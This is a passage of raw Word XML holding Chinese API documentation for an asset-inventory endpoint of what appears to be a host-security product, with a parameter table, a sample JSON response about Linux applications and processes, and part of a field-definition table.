        <w:gridCol w:w="5221"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1DACCC2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F14E464" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F8A9005" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71C3E96E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03DF0418" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="47546C53" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0921FB26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77AC8CA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="319C2D05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F77F08F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5EB5367A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CCC85D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D377335" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="734B7385" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="309BA928" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="75097E8F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68F7C314" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0403D187" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2189D3CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F8F3C4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="047AF785" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08492851" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="799C6258" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F75CFA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65ABA237" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="68225332" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C764D21" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6179E472" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C3DD430" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B020910" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>软件应用名称（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0799005E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07DEA1B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02EDFF29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F628508" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01968C82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>软件应用版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="775FA3BE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13AFBEEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>binPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="583BCECA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09791149" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0498DCEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>linux为二进制路径，windows 为安装路径（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="02ECF9B7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B19ACB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>configPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="130358D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02734B8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C264335" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>配置文件路径（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58348119" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71498EF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/app/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFDDC37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF5FF05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "联系",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "xdu-vm-cent51",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "gam_server",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version": "0.1.7",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "uname": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "binPath": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "configPath": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "processes": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "gam_server",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pid": 5571,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "uname": "root"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E45693D"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452"/>
        <w:gridCol w:w="1072"/>
        <w:gridCol w:w="3911"/>
        <w:gridCol w:w="3647"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="111FAC9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7E31DE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EFF1178" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A4DE750" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69AF9CCF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F6C1B5A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="072D965F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AEE68BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27351DA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BBEBD2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="215C72A3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1162016C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77DD48C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F3DCB23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00A6FD9F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55499C63" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72A6A1B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D95FDC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E35578A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F6C3567" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7F80AB76" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0401785B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4772EE3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F2A4FF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="354A53E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7D101998" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="063ECE13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32745A49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34B882E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2581BBD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="795C2339" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DB2CB09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F240AFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24C642FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65048481" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="29946A32" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EC04428" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11039584" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="518B9A68" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73AF5D1F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1744663F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DBAC46D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
